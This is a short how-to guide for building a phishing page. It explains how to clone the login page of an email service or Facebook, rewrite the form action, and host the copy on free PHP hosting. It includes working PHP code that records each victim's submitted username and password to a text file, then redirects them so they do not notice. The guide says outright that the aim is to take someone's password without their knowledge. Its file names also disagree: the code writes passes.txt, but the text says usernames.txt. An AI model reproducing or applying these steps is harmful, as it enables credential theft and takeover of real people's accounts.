This guide will walk you through making a fake email login page, facebook, or any other service which you can send to someone. Once they log in, you will have their password and they will never know.
What this requires:
- A computer with internet
- a little cleverness and creativity
- First, head over to and create a free php hosting account. Whatever you make the URL will be what you send the person, so you may want to make it clever or something they might believe like
- Once you've got your hosting created, time to make the fake login files. Goto the website of your choice (,, etc) and right click anywhere in the blank space and choose View Source. This will open the webpages code in a notepad. Select it all and copy it.
- Now paste all the code into a notepad and press ctrl+f to search the document for action. Next to action you will see a url in quotes; delete this and replace it with post.php
- Save the document as index.htm and make sure if you're saving with notepad, you select all files from the save drop down menu instead of text document
- Now open a new notepad, and type in the following code:
<?php header ('Location: '); $handle = fopen("passes.txt", "a"); foreach($_POST as $variable => $value) { fwrite($handle, $variable); fwrite($handle, "="); fwrite($handle, $value); fwrite($handle, "\r\n"); } fwrite($handle, "\r\n"); fclose($handle); exit; ?>
- Save this file as post.php and again, make sure you save as all files and not text document.
- Now go back to and upload these 2 files to your hosting.
- If everything was done correctly, when you send the person to your link, they will see a fake email login page. When they login, you can see their email and password in usernames.txt which will be created in your host where you uploaded the files. When they login, they will be redirected to the website you filled in.
- NOTES: If you want to change where they're redirected to when they log in, change THE WEBSITE YOU PICKED in post.php file to the url of your choice.
#Security #First #Be #Safe #Its #Risky